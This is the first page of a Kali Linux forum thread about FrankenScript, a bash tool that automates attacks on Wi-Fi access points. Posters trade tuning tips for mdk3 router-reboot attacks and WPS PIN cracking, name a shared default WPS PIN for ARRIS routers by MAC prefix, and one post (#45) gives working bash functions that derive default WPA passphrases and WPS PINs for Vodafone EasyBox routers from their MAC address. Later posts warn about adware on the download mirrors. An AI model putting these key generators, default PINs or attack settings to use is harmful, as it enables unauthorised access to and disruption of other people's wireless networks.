Page 1 of 10 12345678910 LastLast
Results 1 to 50 of 493

Thread: FrankenScript by Slim76 - It Attacks Access Points and .pcap files

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    2013-Oct
    Posts
    321

    FrankenScript

    FrankenScript no longer attacks capture files, but it can capture them.

    FrankenScript no longer contains the commands to reset access points.

    NOTE:
    Notes:
    This version doesn't have the WEP attacks setup yet, sorry.
    I've added automated attack options.
    Internet can be used while performing network attacks, Internet access would only be available during the automated attacks only.
    FrankenScript works with aircrack-RC3.

    FrankenScript For Kali-2.0 (Test Version) Updated 26/11/2015

    Download Link:
    http://multimirrorupload.com/iopj118..._Kali20.tar.gz

    Please leave feedback.

    ================================================
    This download is for Kali-1.X.X

    FrankenScript_Portable.3rd.May.2015.tar.gz:
    http://www12.zippyshare.com/v/0tnn263D/file.html

    ================================================
    Last edited by slim76; 2015-11-26 at 21:31. Reason: Updated FrankenScript

  2. #2
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?

  3. #3
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?
    Yeah sure mate, its mean't for sharing.
    Glad you like it, its a bit of an ego boost for me as it was my first ever script.
    I really didn't know a single thing about scripting and such, I had to trawl the internet and learn everything as I went. LOL
    I shouldn't have really posted it yet as its not finished, I still need to tweak a few things, eg: auto ENTER on some of the options, and I want to change some bash commands.

    I'm doing a BTHub3 wordlist at the moment (making slow progress with perl though), so sometime in the future I might upload it or even add it to FrankenScript.
    Last edited by slim76; 2014-01-12 at 02:49.

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Yeah. I have couple suggestions.

    1- Just an issue I found, when I go to enter "Attack Mode", I notice that it closes all processes that may cause a problem, but after that, my card no longer picks up networks. However, if I put into monitor mode manually and don't kill the processes, I have no problems.

    2- When using MDK3 to reboot the router, check security type of target network and check for clients. If the target supports WPA-TKIP and has active clients, add -j to mdk3 mon0 m. It should reduce reboot times.

    3- Make airodump stop and restart when using mdk3 to reboot the router. As more and more clients are connected with mdk3 mon0 a, airodump has to remember every single one, which causes it to slow down and freeze.

    Looks good other than those few things though and great share!
    Last edited by soxrok2212; 2014-01-12 at 03:04.

  5. #5
    Join Date
    2013-Oct
    Posts
    321
    Im really not sure about that issue as I've not encounted it myself, the only processes that are killed are:
    NetworkManager
    wpa_supplicant
    The only other thing in the attack mode section is macchanging.

    I don't have that issue and I can't get access to another machine for a while so I can't really look into it to well, hopefully someone else might be able enlighten us.

    Cheers for the suggestions.
    I haven't looked into mdk3 properly yet, will have to try the attacks myself and see how I can impliment them into the script (More headache!! LOL).

    Oh I just had a thought, maybe the timing might be out, you could try making the sleep time longer.
    Last edited by slim76; 2014-01-12 at 03:27.

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Ok. I'll try it again tomorrow and see what happens!

  7. #7
    Join Date
    2013-Oct
    Posts
    321
    If anyone knows of any other WPS default pin generaters please could you post them for me.
    Many thanks.

  8. #8
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by slim76 View Post
    If anyone knows of any other WPS default pin generaters please could you post them for me.
    Many thanks.
    I noticed with my wps pin script your only using the last 6 characters in the mac address sometimes you need to use the first 6 instead.
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  9. #9
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by shaberu View Post
    I noticed with my wps pin script your only using the last 6 characters in the mac address sometimes you need to use the first 6 instead.
    Oh blimey I didn't know that, cheers matey.
    Sorry mate I didn't know who wrote the script, hope you don't mind that I added it to FrankenScript?.
    I'll add credits to the script at some point, would you mind if I included you and your pin generater?.

  10. #10
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    I dont mind if i did wouldn't try and help lol
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  11. #11
    Just using you're script now and it is very impressive.

    Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement )

    The other thing, I wasn't aware that it must be run from root - this had me baffled untill I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

    A netgear WPS pin generator would be nice - all I know is that they invariable start with a 2 but hey what do i know.

    Rab.

  12. #12
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by flyinghaggis View Post
    Just using you're script now and it is very impressive.

    Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement )

    The other thing, I wasn't aware that it must be run from root - this had me baffled untill I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

    A netgear WPS pin generator would be nice - all I know is that they invariable start with a 2 but hey what do i know.

    Rab.
    Many thanks for the feedback.
    It did originally have the folder you're talking about, but I removed it while cleaning and adding to the script, I'll end up putting it back at some point.

    What do you mean by wash and -C switch?.

  13. #13
    Quote Originally Posted by slim76 View Post
    What do you mean by wash and -C switch?.
    -C, --ignore-fcs Ignore frame checksum errors......

    If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

    Rab.

    Forgot - It is in the wash help

  14. #14
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by flyinghaggis View Post
    -C, --ignore-fcs Ignore frame checksum errors......

    If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

    Rab.

    Forgot - It is in the wash help
    Kool, I'll add it to the script so others with the same issue can benefit.

  15. #15
    Join Date
    2013-Jul
    Posts
    844
    We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to and install an\ download.exe file on to your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs they were all over the place to include showing up in notepad. And we never actually got to your program.
    We are not happy campers.

    Musket Teams Alpha and Bravo

  16. #16
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by mmusket33 View Post
    We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to and install an\ download.exe file on to your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs they were all over the place to include showing up in notepad. And we never actually got to your program.
    We are not happy campers.

    Musket Teams Alpha and Bravo
    Cheers for the heads up mate.
    I've checked it out and the downloads are fine, maybe you clicked on the silly ads that they use, avoid the ads and all should be good.

    Your reply is kinda strange to me, you're the only person that has mentioned such issue, and what you said just doesn't add up.
    I made a post at 02:46 AM saying that I had updated FrankenScript, you replied at 03:13 AM saying that you spent the last half an hour removing viruses.
    So you're saying you spent 30mins removing viruses, plus the time it takes to browse to the mirror site and browse and try ALL the mirrors all within 27 minutes. LOL

    Update:
    I've added several direct links.
    Last edited by slim76; 2014-01-14 at 04:04.

  17. #17
    Join Date
    2013-Jul
    Posts
    844
    Again for clarity this is what we get - !!!Downloaders beware!!!

    We are using XP for the download

    For example:
    We went to: http://rghost.net/51637035

    There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

    You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

    FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

    We have already seen this on the original download link and do not wish to do through that again. ie the same csize file just a more embedded name. Here the stick the actual file name at the beginning but give you an exe file instead.

    We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

    Musket Team A/B

  18. #18
    Join Date
    2013-Jul
    Posts
    844
    Okay further to our above comments.

    Our lab has six computers. We tried two other computers running XP and in every case clicking on the file gave us an exe file. The name of the file changed with the site but in every case it was a small exe. You do not want to run this - see our original above. Next we thought to try the download with kali-linux


    Using kali-linuix we downloaded the correct file named FrankenScript-v2.tar.gz.

    So for most of these links shown for this file we suggest users not use XP for the download - you will end up with a load of spyware and bogus products.


    MTA/MTB

  19. #19
    Join Date
    2013-Jul
    Posts
    844
    Again for clarity this is what we get - !!!Downloaders beware!!!

    We are using XP for the download

    For example:
    We went to: http://rghost.net/51637035

    There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

    You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

    FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

    We have already seen this on the original download link and do not wish to do through that again. ie the same csize file just a more embedded name. Here the stick the actual file name at the beginning but give you an exe file instead.

    We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

    Musket Team A/B

  20. #20
    Very nice job indeed
    Some part of the code are very, very familiar to me.
    Last edited by kcdtv; 2014-01-14 at 19:32.

  21. #21
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    Very nice job indeed
    Some part of the code are very, very familiar to me.
    What part?, let me guess, its either the vodafone or the WPSPIN, am I correct?.
    Please let me know and I'll add credits for you or remove it , which ever you choose I'm kool.

  22. #22
    Join Date
    2013-Dec
    Posts
    11
    Wow what nice this FrankSteroids bombed script, wanna try this with my new 2W adapter that is coming

  23. #23
    Join Date
    2013-Oct
    Posts
    321
    I've updated FrankenScript and posted the download link on the first page.

  24. #24
    Join Date
    2013-Jul
    Posts
    844
    We figured out what was going on. We have six computers in out lab. After trying two XP downloads we tried it with kali-linux and got the correctfile

    We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name.. Look to see if it is an .exe file. Do not run this file.

    Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.

    For example you might load a file called ABCDEF.tar.gz. When you get the yellow rectangle asking to run or save, the file name will say ABCDEF.tar.gz. BUT when you get the file saved you will get something like ABCDEF.tar.gz.exe If you run this your antivirus will go nuts AND you will get a ton of useless files asking to check your computer or provide some sort of service. We tested this exe file with a persistent usb version of XP that we were going to trash. We even had icons showing up in notepad.

    However if you download the file with kali-linux you get what you asked for, and are not sent to viral land of spyware and products no one wants or will ever need.

    We have no knowledge about Windows 7 but we suspect the result would mimic XP

    http://mir.cr/
    http://www21.zippyshare.com/
    http://rghost.net/
    http://www.sendmyway.com/
    http://fichier.com/
    http://180upload.com/

  25. #25
    We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name.. Look to see if it is an .exe file. Do not run this file.

    Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.
    With all due respect this is a well KNOWN or should be FACT.
    Most websites now are cluttered with download buttons which are not associated with the actual file (not all downloads are malware but are equally annoying and the unitiated do get caught(Once bitten Twice Shy or should be) I still get caught sometimes and I have been using the net since 95.

    One possibility, as they are hosting the file, is they are paid in some way for each alternative download while some will merely produce a popup with advertising.

    The moral of this is "Buyer/downloader beware(Unsure? Don't Download unless you know how to clean your machine if you make an error)

    Rab.

  26. #26
    Join Date
    2013-Oct
    Posts
    321
    I've just checked : http://rghost.net/51637035 and don't see a single thing wrong.
    I used the direct link and didn't see a single advert or any dodgey download buttons or the other clickable buttons like you mention.

    Please stop trying to make it sound like my downloads are dodgey, there's nothing wrong with them.
    Stop clicking other links and you wont have any issues, why you would click on any other links beats the **** out of me. LOL

    I'm sure other members and the mods can comfirm that my downloads are NOT dodgey.
    Last edited by slim76; 2014-01-14 at 12:32.

  27. #27
    Please stop trying to make it sound like my downloads are dodgey, there's nothing wrong with them, I can't be responsible for people that don't know how the internet works.
    That was not my intention - Only explaining the intricisies of downloading from certain hosting sites.
    Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

    This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

    Rab.

    Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup- requesting you download ilivid, most inexperienced users would get caught with this. -Site Dependant?
    Last edited by flyinghaggis; 2014-01-14 at 12:39.

  28. #28
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by flyinghaggis View Post
    That was not my intention - Only explaining the intricisies of downloading from certain hosting sites.
    Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

    This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

    Rab.

    Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup- requesting you download ilivid, most inexperienced users would get caught with this. -Site Dependant?
    Sorry mare, It wasn't aimed at you mate, it was aimed at musket.
    Sorry if it came across wrong.

    Not sure why he/she would say such things, not sure what the person has against me as I've done nothing to the person. :-(

  29. #29
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams wish to state there is nothing wrong with the Frankenscript program.

    If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the d
    ownload process and only shows up in the folder you save it to. This leads to viralville.

    If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

    Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.

  30. #30
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by mmusket33 View Post
    Musket Teams wish to state there is nothing wrong with the Frankenscript program.

    If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the d
    ownload process and only shows up in the folder you save it to. This leads to viralville.

    If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

    Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.
    Yeah but you posted their after you posted here saying that you posted it there too (Check the time stamp). LOL
    I'm kool now musket has made things more clear. :-)
    Hope there's no bad feelings.

    I've already downloaded your script but haven't had chance to try it yet, I'll test it later, cheers for the heads up though.
    Last edited by slim76; 2014-01-14 at 14:40.

  31. #31
    Join Date
    2013-Dec
    Posts
    11
    windows 8.1 it's all fine downloading, plz stop the **** hurt

  32. #32
    It is WPSPIN you are correct
    Please, do not worry and do not delete anything, you are welcome to use the code.
    I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
    Actually you gave me credit
    And a big thanks to the creators of the other two wps default pin generaters.
    I sincerely appreciate

    For information,
    - The person that revealed the algorithm of easybox arcadyan Vodafone is Stefan Viehböck Vodafone EasyBox Default WPS PIN Algorithm Weakness
    - And one of the algorithm used in WPSPIN ( the one that is mostly used among manufacturer which is a conversion form hexadecimal to decimal of half end bssid ) was previously discovered by zhao chunsheng in a script called computepinC83A35 for Tenda router (with beginning bssid C8:3A:35:XX:XX:XX) published in something like may 2012
    I thought i found it in something like ocotber-novmebr 2012 but i realized that it was found long before as you can see in the homepage of the script : http://gjkiss.info/2012/04/get-the-p...-00b00c-081075
    It is the one that is used in the python script included in your script, WPSpin.py.
    The one that i found out is for HUAWEI HG532c and uses part of the essid and some addition before conversion to decimal and is integrated in the function that attribute PIN that you use in your script.

    Keep on the good job and fell free to use WPSPIN, that is what GPL v 3. is for.

    Cheers
    Last edited by kcdtv; 2014-01-16 at 18:29.

  33. #33
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by kcdtv View Post
    It is WPSPIN you are correct
    Please, do not worry and do not delete anything, you are welcome to use the code.
    I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
    Actually you gave me credit
    lol if im not the first person to find this that i dont want any credit i do not deserve.

    also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  34. #34
    also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.
    I do
    That is a really interesting, thank you very much for sharing it.
    Could you give us the exact model of the router?
    I guess the WPS in enabled. Could you confirm it?
    Is there any AP rate limit system?

    lol if im not the first person to find this that i dont want any credit i do not deserve.
    i guess no one here wants credits for things discovered by other people

    Smile while you can for in the future there my be nothing to smile about
    For sure!

  35. #35
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by kcdtv View Post
    I do
    That is a really interesting, thank you very much for sharing it.
    Could you give us the exact model of the router?
    I guess the WPS in enabled. Could you confirm it?
    Is there any AP rate limit system?
    I really dont know if there is limiting since its cracked on the first pin.
    but the wps is actually forced enabled and locked on this one.
    and here is a screen capture of the HW/FW Versions serial marked out because default password
    Capture.jpg
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  36. #36
    Join Date
    2013-Mar
    Location
    localhost
    Posts
    41
    Thank you , i hope be a nice tool
    r00tv.org
    telegram @bondbenz

  37. #37
    Join Date
    2013-Oct
    Posts
    321
    I like the fact that you guys are modest, its a rare thing now days.
    Believe me you all desevre credit regardless, I really appriciate your work and efforts, I couldn't have done what I did if it wasn't for you guys. :-)

    Cheers again guys.

  38. #38
    Join Date
    2013-Dec
    Posts
    11
    I found the pin of a Tenda router right now with WPSPIN & ur script

    the other easybox script is for what routers??

    Thanks.
    Last edited by VinnyG; 2014-01-17 at 01:22.

  39. #39
    Coooool
    Thank you so much Shaberu !!!!

    the other easybox script is for what routers??
    The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system
    And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
    For the PIN, which is a variation on the pattern patented, it has been reported on german easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/s...bility_v10.txt
    It has been also reported later to be in used in spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code where corrected by Coeman76 ( some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on spanish Vodafone acess point which may not be correct on other ones) and he unified the two algorithm ( default WPA and default PIN ) in one tool.
    Last edited by kcdtv; 2014-01-17 at 10:11.

  40. #40
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post



    The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system
    And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
    For the PIN, which is a variation on the pattern patented, it has been reported on german easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/s...bility_v10.txt
    It has been also reported later to be in used in spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code where corrected by Coeman76 ( some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on spanish Vodafone acess point which may not be correct on other ones) and he unified the two algorithm ( default WPA and default PIN ) in one tool.
    So has easy_box been fully implimented into WPSPIN?, If it has I'll remove easy_box from FrankenScript.

  41. #41
    Join Date
    2013-Jun
    Posts
    123
    'Scan for possible targets.
    Once you've identified a target press Ctrl-C to exit the scan and to continue.
    Press [Enter] to start the scan.
    (i pressed enter)

    Please choose an AP
    (nothing but blank space)


    Please input the number of your chosen target:'

    Where is the choices of an AP suppose to appear?

  42. #42
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by brazen View Post
    'Scan for possible targets.
    Once you've identified a target press Ctrl-C to exit the scan and to continue.
    Press [Enter] to start the scan.
    (i pressed enter)

    Please choose an AP
    (nothing but blank space)


    Please input the number of your chosen target:'

    Where is the choices of an AP suppose to appear?
    The choices should appear just above "Please input the number of your chosen target".
    Try what flyinghaggis suggested, if that doesn't work look in the FrankenScript temp folder and delete anything that might be in there.
    Did wash display any access points?.
    Did you select you WiFi device?.
    Did you enable attack mode?.
    Did you recieve any error messages?.
    Last edited by slim76; 2014-01-17 at 22:56.

  43. #43
    Quote Originally Posted by slim76 View Post
    So has easy_box been fully implimented into WPSPIN?, If it has I'll remove easy_box from FrankenScript.
    No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    cheers and may the force be with you and frankenscript.sh.

  44. #44
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by kcdtv View Post
    No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

    cheers and may the force be with you and frankenscript.sh.
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

  45. #45
    Quote Originally Posted by slim76 View Post
    LOL, cheers dude.

    I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.
    i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan

    I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
    You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
    It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
    than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )

    Code:
    ARCADYAN(){
    # WPSPIN 1.5 - GPL v 3  by kcdtv
    # This function uses three amazing works
    #   1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc 
    #   2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
    #   3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
    # 
    # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code
    # This function is based on the script easybox_keygen.sh previously mentioned
    # # The quotation from the original work start with double dash and are beetwen quotes
    # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA  
    # the lines quoted with six dash and "unchanged"  are exactly the same than in easybox_keygen  like this "######unchanged" 
    
    
    # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX)
    # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
    # give the full WPS PIN ($PIN)
    
    ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN
    ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
    ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
    ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})  ######unchanged
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})  ######unchanged
    K1=$((($c1)%16))  ######unchanged
    K2=$((($c2)%16))  ######unchanged
    X1=$((K1^${deci[3]}))  ######unchanged
    X2=$((K1^${deci[2]}))  ######unchanged
    X3=$((K1^${deci[1]}))  ######unchanged
    Y1=$((K2^0x${hexi[1]}))  ######unchanged
    Y2=$((K2^0x${hexi[2]}))  ######unchanged
    Y3=$((K2^0x${hexi[3]}))  ######unchanged
    Z1=$((0x${hexi[2]}^${deci[3]}))  ######unchanged
    Z2=$((0x${hexi[3]}^${deci[2]}))  ######unchanged
    Z3=$((K1^K2))  ######unchanged
    STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit  
    DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
    CHECKSUM
    }

    I put you back CHECKSUM in case it helps you

    Code:
    CHECKSUM(){                                                                  # The function checksum was written for bash by antares_145 form crack-wifi.com
    PIN=`expr 10 '*' $STRING`                                                    # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
    ACCUM=0                                                                      # to get a result using this function)
                                                                 
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`       # multiplying the first number by 3, the second by 1, the third by 3 etc....
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`             # so we follow the pattern for our seven number
    
    DIGIT=`expr $ACCUM '%' 10`                                                   # we define our digit control: the sum reduced with base 10 to the unit number
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                                 # the checksum is equal to " 10 minus  digit control "
    
    PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                             # Some zero-padding in case that the value of the PIN is under 10000000   
    }                                                                            # STRING + CHECKSUM gives the full WPS PIN


    feel free to use the code and if yiou have any question about it do not hesitate to ask


    cheers

  46. #46
    The script has to be run from root

    copy the script into the root folder and run i from there - it should work....

    Rab.

  47. #47
    Join Date
    2013-Oct
    Posts
    321
    Update:
    FrankenScript-v3 has been added to the first page.

  48. #48
    Join Date
    2013-Jun
    Posts
    123
    slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

  49. #49
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by brazen View Post
    slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.
    http://www63.zippyshare.com/d/678603...ript-v3.tar.gz
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  50. #50
    This one is downloaded by clicking on the bright orange button at the top right if you hover over it
    you will see in the botton left of your screen a description of the file you are downloading.

    I downloaded this from a Kali guest in VMWare using iceweasel.

    The other buttons are misleading Yes but that's the nature of the game.

    Other browsers may display the download differently but I doubt it (Just hover over it to check the description).

    Rab.

Similar Threads

  1. Howto frankenScript
    By Quest in forum How-To Archive
    Replies: 255
    Last Post: 2016-02-09, 23:37
  2. Kali 2.0 on a USB, trying to access files from Windows 10 OS
    By Justa5uvus in forum General Archive
    Replies: 1
    Last Post: 2016-01-28, 11:41
  3. Any other programs to create evil twin/rogue access points?
    By Dark Terror in forum General Archive
    Replies: 1
    Last Post: 2015-05-11, 02:08
  4. WPA PSK Key in pcap/cap files?
    By Kalinoob in forum General Archive
    Replies: 1
    Last Post: 2014-01-06, 15:39
  5. ferret makes huge .pcap files
    By 3t3st3r in forum General Archive
    Replies: 2
    Last Post: 2013-05-19, 19:22

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •